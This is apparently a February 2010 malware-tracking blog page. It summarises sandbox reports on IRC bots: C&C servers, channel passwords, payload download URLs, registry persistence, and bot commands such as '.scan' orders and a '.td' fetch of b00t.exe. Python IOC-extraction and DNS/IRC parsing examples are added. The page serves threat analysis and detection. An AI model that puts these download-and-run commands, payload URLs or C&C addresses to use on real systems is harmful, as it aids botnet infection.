Month: February 2010

entranessaonda.com

Host Name           IP Address
entranessaonda.com  64.32.27.135
Opened listening TCP connection on port: 35549
* C&C Server: 64.32.27.135:6667
* Server Password:
* Username: cvvfqi
* Nickname: L2-cx6i
* Channel: #ceara (Password: )
* Channeltopic: :.scan 75 1 189.42.x.x 2 1 189.42.x.x
The channel topic is the standing order every bot executes on join; here it is a .scan command aimed at the 189.42.x.x range.

irc.gizemdolu.net

Host Name          IP Address
irc.gizemdolu.net  213.229.82.141
Opened listening TCP connection on port: 113 (ident responder, so the IRC server's ident lookup succeeds)
* C&C Server: 213.229.82.141:6667
* Server Password:
* Username: jmlleo
* Nickname: deZ-81849
* Channel: #ri0t (Password: milf)
* Channeltopic:
Registry Changes by all processes
Create or Open
Changes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run “Task manager” = taskmngr.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices “Task manager” = taskmngr.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run “Task manager” = taskmngr.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole “EnableDCOM”
Persistence is the usual Run/RunServices autorun triple under the misleading value name “Task manager”; the EnableDCOM value is touched but its new data was not captured in this report.

irc.ppoeconx.com

* C&C Server: 69.245.107.191:6667
* Channels: ##im, #Q
Server statistics from the IRCd's LUSERS reply at connect time:
* Invisible Users: 330
* Operators: 1 operator(s) online
* Channels: 8 channels formed
* Clients: I have 358 clients and 0 servers
* Local users: Current Local Users: 358 Max: 435
* Global users: Current Global Users: 358 Max: 390

Srv2.0wn3d.3u (ms0608 exploit)

Host Name          IP Address
scheck.sytes.net   208.51.78.252
ferroclubchile.cl  200.72.160.252
UDP Connections
* Remote IP Address: 127.0.0.1 Port: 1037
  Send Datagram: 55 packet(s) of size 1
  Recv Datagram: 55 packet(s) of size 1
Download URLs
* http://208.51.78.252/ps.exe (scheck.sytes.net)
* http://200.72.160.252/img/fam//ps.exe (ferroclubchile.cl)
Outgoing connection to remote server: scheck.sytes.net TCP port 80
Outgoing connection to remote server: ferroclubchile.cl TCP port 80
The same second stage (ps.exe) is staged on both hosts, one a dynamic-DNS name and one a compromised site.
DNS Lookup Host

hub.1282.net

Remote Host     Port Number
193.104.27.98   80
218.61.22.10    1863 (MSN Messenger)
* The data identified by the following URLs was then requested from the remote web server:
  o http://193.104.27.98/pizda.php
  o http://193.104.27.98/fox.bin
  o http://www.ip-adress.com/ (public IP lookup)
IRC client traffic observed:
  MODE [N00_USA_XP_7947582]8 @ -ix
  PONG eee.4088.com
  JOIN #superman open
  MODE #superman -ix
* The following ports were open in the system:
  Port  Protocol  Process
  1053

flex.sintoniatotal.org

* Unknown Connections
  o Host By Name:
    + Requested Host: flex.sintoniatotal.org
    + Resulting Address: 120.126.19.44
  o Connection Established: 0
  o Socket: 0
* Outgoing Connections
  o Transport Protocol: TCP
  o Remote Address: 120.126.19.44
  o Remote Port: 4545
  o Connection Established: 0
  o Socket: 1752
The name resolved, but the TCP connect to 120.126.19.44:4545 did not complete (Connection Established: 0), so the C&C did not accept the connection during analysis.
More here: http://www.sunbeltsecurity.com/cwsandboxreport.aspx?id=12056277&cs=F7D3B935AA72AC77A9162D505FB6D5EE

h3ll.bounceme.net

Host Name          IP Address
h3ll.bounceme.net  66.11.238.23
Opened listening TCP connection on port: 34115
* C&C Server: 66.11.238.23:1993
* Server Password:
* Username: cxcds
* Nickname: L2-|7j8
* Channel: #vncshit# (Password: suckmybigdick)
* Channeltopic: :.scan 64 0 y 3 0 58.x.x.x
Outgoing connection to remote server: 58.163.0.1 TCP port 5900
Outgoing connection to remote server: 58.163.0.55
The topic orders a scan of 58.x.x.x and the sample immediately starts connecting to port 5900 (VNC) in that range, which matches the channel name.

bmcash.net

# UDP Connections
  o DNS Data
    + Name Server 192.168.1.200
  # DNS Package:
    * ID: $100
    * Type: Query
    * OP Code: Query
    * Flags: RD
    * R Code: NoError
    * QD Count: 1
    * AN Count: 0
    * NS Count: 0
    * AR Count: 0
  o Question Section
    + Question:
      # Name: bmcash.net
      #
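The packet the sandbox summarised above, built and decoded with the Python standard library. This is an added example, not part of the original post or of the sandbox's own code; it reads the report's `$100` as the hexadecimal transaction ID 0x0100 (an assumption about the report's notation), and the response side uses a constructed answer address (192.0.2.10) only to show name-pointer decoding, since the page records no answer.

```python
"""Build and decode the DNS query whose header fields the report above lists (added example)."""
import struct

OPCODES = {0: "Query", 1: "IQuery", 2: "Status"}
RCODES = {0: "NoError", 1: "FormErr", 2: "ServFail", 3: "NXDomain", 5: "Refused"}
FLAG_BITS = ((0x0400, "AA"), (0x0200, "TC"), (0x0100, "RD"), (0x0080, "RA"))


def encode_name(name: str) -> bytes:
    """Wire form: length-prefixed labels terminated by a zero byte."""
    labels = name.rstrip(".").split(".")
    return b"".join(bytes([len(l)]) + l.encode("ascii") for l in labels) + b"\x00"


def decode_name(data: bytes, off: int):
    """Read a name at off, following RFC 1035 compression pointers."""
    labels = []
    while True:
        n = data[off]
        if n == 0:
            return ".".join(labels), off + 1
        if n & 0xC0 == 0xC0:
            ptr = struct.unpack("!H", data[off:off + 2])[0] & 0x3FFF
            tail, _ = decode_name(data, ptr)
            labels.append(tail)
            return ".".join(labels), off + 2
        labels.append(data[off + 1:off + 1 + n].decode("ascii"))
        off += 1 + n


def build_query(name: str, txid: int, rd: bool = True, qtype: int = 1) -> bytes:
    """Standard query: QR=0, OPCODE=0, RD set, one question, no other sections."""
    flags = 0x0100 if rd else 0x0000
    header = struct.pack("!HHHHHH", txid, flags, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)  # class IN


def build_response(query: bytes, ip: str, ttl: int = 300) -> bytes:
    """Answer an A query with one record; the RR name is a pointer (0xC00C) to offset 12."""
    txid, flags, qd, _, _, _ = struct.unpack("!HHHHHH", query[:12])
    header = struct.pack("!HHHHHH", txid, flags | 0x8000 | 0x0080, qd, 1, 0, 0)
    rr = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4) + bytes(int(o) for o in ip.split("."))
    return header + query[12:] + rr


def parse_packet(data: bytes) -> dict:
    """Decode header and sections into the same fields the sandbox report prints."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", data[:12])
    info = {
        "id": txid,
        "type": "Response" if flags & 0x8000 else "Query",
        "opcode": OPCODES.get((flags >> 11) & 0xF, "Reserved"),
        "flags": [name for bit, name in FLAG_BITS if flags & bit],
        "rcode": RCODES.get(flags & 0xF, "Other"),
        "qdcount": qd, "ancount": an, "nscount": ns, "arcount": ar,
        "questions": [], "answers": [],
    }
    off = 12
    for _ in range(qd):
        name, off = decode_name(data, off)
        qtype, qclass = struct.unpack("!HH", data[off:off + 4])
        off += 4
        info["questions"].append({"name": name, "qtype": qtype, "qclass": qclass})
    for _ in range(an):
        name, off = decode_name(data, off)
        rtype, rclass, ttl, rdlen = struct.unpack("!HHIH", data[off:off + 10])
        off += 10
        rdata = data[off:off + rdlen]
        off += rdlen
        if rtype == 1 and rdlen == 4:
            rdata = ".".join(str(b) for b in rdata)  # A record: dotted quad
        info["answers"].append({"name": name, "type": rtype, "ttl": ttl, "rdata": rdata})
    return info


if __name__ == "__main__":
    # $100 in the report is read here as hex 0x0100 (an assumption about the notation).
    q = build_query("bmcash.net", 0x0100)
    print(parse_packet(q))
    print(parse_packet(build_response(q, "192.0.2.10")))  # constructed answer address
```

The query is 28 bytes: a 12-byte header, the 12-byte encoded name, and the 4-byte type/class. Note that with ID 0x0100 and only RD set, the first four bytes on the wire are 01 00 01 00, which is worth remembering when eyeballing a capture.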

tshge.mamadody.mobi

Host Name            IP Address
tshge.mamadody.mobi  74.117.174.95
* C&C Server: 74.117.174.95:15656
* Server Password:
* Username: nn
* Nickname: hh[DEU|XP]5178227
* Channel: #t (Password: )
* Channeltopic: :.td http://expobauhaus.net/b00t.exe c:Icon32fuhygfdnf.exe 1 -s
* C&C Server: 74.117.174.95:15656
* Server Password:
* Username: nn
* Nickname: [DEU|XP]5665417
* Channel: #t (Password: )
* Channeltopic: :.td http://expobauhaus.net/b00t.exe c:Icon32fuhygfdnf.exe 1 -s
Two connections to the same server under generated nicks (country code, OS and a random number); the topic is a download order (.td) that fetches b00t.exe from expobauhaus.net to a local path.
Registry Changes by
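Turning these flattened C&C blocks into IOCs by hand gets old fast. The following Python is an added example, not the blog's or the sandbox's own code; it assumes the field order shown in the reports on this page (Server, Server Password, Username, Nickname, Channel, Channeltopic), treats the topic as a bot command and interprets the two verbs visible here (.scan targets, .td URL and drop path) from their arguments, and runs on a constructed composite of three of the reports above (mamadody, h3ll.bounceme, gizemdolu) with the registry backslashes restored.

```python
"""IOC extractor for flattened CWSandbox-style IRC bot reports (added example)."""
import re

# The C&C block is assumed to list its fields in the order the reports above show:
# Server, Server Password, Username, Nickname, Channel (Password), Channeltopic.
# The topic runs to the end of its line or, on a flattened report, to the next
# C&C block or the next section heading.
C2_RE = re.compile(
    r"C&C Server:\s*(?P<host>[^\s:]+):(?P<port>\d+)"
    r"\s*\*\s*Server Password:\s*(?P<spass>\S*?)"
    r"\s*\*\s*Username:\s*(?P<user>\S+)"
    r"\s*\*\s*Nickname:\s*(?P<nick>\S+)"
    r"\s*\*\s*Channel:\s*(?P<chan>\S+)\s*\(Password:\s*(?P<cpass>[^)]*)\)"
    r"\s*\*\s*Channeltopic:\s*(?P<topic>[^\n]*?)"
    r"(?=\s*\*\s*C&C Server:|\s*Registry Changes|\s*Outgoing connection|\s*$)",
    re.MULTILINE,
)
URL_RE = re.compile(r"https?://[^\s\"'<>)]+")
# Autorun keys: Run / RunServices / RunOnce under CurrentVersion, in HKLM or HKCU.
# Straight and curly quotes are accepted, and the backslash before Run is optional
# because some copies of these reports have lost their backslashes.
AUTORUN_RE = re.compile(
    r'(HKEY_(?:LOCAL_MACHINE|CURRENT_USER)[\w\\]*?CurrentVersion\\?Run(?:Services|Once)?)'
    r'\s*[“"]([^”"]+)[”"]\s*=\s*(\S+)'
)
TARGET_RE = re.compile(r"(?:\d{1,3}|x)(?:\.(?:\d{1,3}|x)){3}")  # 58.x.x.x style


def parse_topic(topic: str):
    """Interpret the channel topic as the bot command it is (.scan or .td)."""
    tokens = topic.lstrip(":").split()
    if not tokens:
        return None
    verb, args = tokens[0], tokens[1:]
    info = {"verb": verb, "args": args}
    if verb == ".scan":
        # Target ranges appear as dotted quads with 'x' wildcards.
        info["targets"] = list(dict.fromkeys(a for a in args if TARGET_RE.fullmatch(a)))
    elif verb == ".td":
        urls = [a for a in args if "://" in a]
        info["url"] = urls[0] if urls else None
        if urls:
            i = args.index(urls[0])
            info["drop_path"] = args[i + 1] if i + 1 < len(args) else None
    return info


def extract_iocs(report: str) -> dict:
    """Return C&C connections, download URLs and autorun persistence from one report."""
    c2 = []
    for m in C2_RE.finditer(report):
        c2.append({
            "host": m.group("host"), "port": int(m.group("port")),
            "server_password": m.group("spass"), "user": m.group("user"),
            "nick": m.group("nick"), "chan": m.group("chan"),
            "cpass": m.group("cpass"), "topic": m.group("topic").strip(),
            "command": parse_topic(m.group("topic")),
        })
    urls = list(dict.fromkeys(URL_RE.findall(report)))
    autoruns = [{"key": k, "name": n, "value": v} for k, n, v in AUTORUN_RE.findall(report)]
    return {"c2": c2, "download_urls": urls, "autoruns": autoruns}


# Constructed composite of three reports from this page (mamadody, h3ll.bounceme,
# gizemdolu), with the registry backslashes restored.
SAMPLE_REPORT = r"""tshge.mamadody.mobi 74.117.174.95
* C&C Server: 74.117.174.95:15656
* Server Password:
* Username: nn
* Nickname: hh[DEU|XP]5178227
* Channel: #t (Password: )
* Channeltopic: :.td http://expobauhaus.net/b00t.exe c:Icon32fuhygfdnf.exe 1 -s
* C&C Server: 66.11.238.23:1993
* Server Password:
* Username: cxcds
* Nickname: L2-|7j8
* Channel: #vncshit# (Password: suckmybigdick)
* Channeltopic: :.scan 64 0 y 3 0 58.x.x.x
Registry Changes by all processes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Task manager" = taskmngr.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run "Task manager" = taskmngr.exe
"""

if __name__ == "__main__":
    import json
    print(json.dumps(extract_iocs(SAMPLE_REPORT), indent=2))
```

The same regexes work on the one-line flattened form the reports arrive in, because the lookahead on the topic stops at the next `* C&C Server:`, `Registry Changes` or `Outgoing connection` marker rather than relying on a line break.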

83.140.172.212 (Worm.IM.Sohanad)

Remote Host      Port Number
64.62.181.46     80
83.140.172.212   6667
* The data identified by the following URL was then requested from the remote web server:
  o http://h1.ripway.com/sxmast/config.php
IRC client traffic observed:
  NICK u-uu6
  USER l4 8 * :0.0
  PONG :3083554165
  JOIN #sxsouls nopass
* The following port was open in the system:
  Port  Protocol  Process
  1056  TCP       usx32.exe (%AppData%\usx32.exe)
Registry
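The raw IRC fragments these reports print (NICK, USER, PONG, JOIN and MODE run together) can be split back into messages and checked for the generated-nick shapes that recur across this month's samples. This is an added example, not part of the original page; the nick patterns are heuristics I derived from the nicks shown on this page, not a published rule, and the third session (a human-looking client) is constructed for contrast.

```python
"""Split run-together IRC client traffic into messages and profile the session (added example)."""
import re

# Client-to-server commands that mark the start of a new message in the flattened text.
COMMANDS = ("PASS", "NICK", "USER", "JOIN", "MODE", "PING", "PONG", "PRIVMSG", "TOPIC", "QUIT")
SPLIT_RE = re.compile(r"\s*\b(?=(?:%s)\b)" % "|".join(COMMANDS))

# Heuristic nick-generator signatures derived from the nicks on this page (assumption,
# not a published rule): [COUNTRY|OS]digits, [N00_COUNTRY_OS_digits], short-prefix-random.
BOT_NICK_PATTERNS = (
    re.compile(r"\[[A-Z]{2,3}\|[A-Za-z0-9]+\]\d{4,}"),      # [DEU|XP]5178227
    re.compile(r"\[N00_[A-Z]{2,3}_[A-Za-z0-9]+_\d{4,}\]"),  # [N00_USA_XP_7947582]
    re.compile(r"^[A-Za-z0-9]{1,3}-[A-Za-z0-9|]{3,}$"),      # L2-cx6i, deZ-81849, u-uu6
)


def split_messages(blob: str) -> list:
    """'NICK a USER b 8 * :0.0 JOIN #c k' -> ['NICK a', 'USER b 8 * :0.0', 'JOIN #c k']"""
    return [m.strip() for m in SPLIT_RE.split(blob) if m.strip()]


def parse_message(msg: str):
    """Return (COMMAND, params); a trailing ':' parameter may contain spaces (RFC 1459)."""
    cmd, _, rest = msg.partition(" ")
    if rest.startswith(":"):
        params = [rest[1:]]
    elif " :" in rest:
        head, trailing = rest.split(" :", 1)
        params = head.split() + [trailing]
    else:
        params = rest.split()
    return cmd.upper(), params


def summarize(blob: str) -> dict:
    """Profile one client session: identity, channels joined (with keys), modes, nick heuristics."""
    s = {"nick": None, "user": None, "channels": [], "modes": [], "pong": [], "bot_like_nick": False}
    for raw in split_messages(blob):
        cmd, params = parse_message(raw)
        if cmd == "NICK" and params:
            s["nick"] = params[0]
        elif cmd == "USER" and params:
            s["user"] = params[0]
        elif cmd == "JOIN" and params:
            chans = params[0].split(",")
            keys = params[1].split(",") if len(params) > 1 else []
            for i, ch in enumerate(chans):
                s["channels"].append({"channel": ch, "key": keys[i] if i < len(keys) else None})
        elif cmd == "MODE" and params:
            s["modes"].append({"target": params[0], "modes": " ".join(params[1:])})
        elif cmd == "PONG":
            s["pong"].append(params[0] if params else "")
    # A MODE on a non-channel target is the client's own nick; useful when NICK was not captured.
    candidates = [s["nick"]] + [m["target"] for m in s["modes"] if not m["target"].startswith(("#", "&"))]
    s["bot_like_nick"] = any(p.search(n) for n in candidates if n for p in BOT_NICK_PATTERNS)
    return s


# Two fragments from the reports on this page, plus a constructed human-looking session.
SESSIONS = {
    "sohanad": "NICK u-uu6 USER l4 8 * :0.0 PONG :3083554165 JOIN #sxsouls nopass",
    "hub.1282.net": "MODE [N00_USA_XP_7947582]8 @ -ix PONG eee.4088.com JOIN #superman open MODE #superman -ix",
    "benign (constructed)": "NICK johndoe USER jd 0 * :John JOIN #linux",
}

if __name__ == "__main__":
    for label, blob in SESSIONS.items():
        print(label, summarize(blob))
```

The JOIN key (`nopass`, `open`) is the channel password the bot presents, which is the same field the CWSandbox reports print as `(Password: ...)`; together with the nick shape it is usually enough to tie a network capture back to one of these families without the binary.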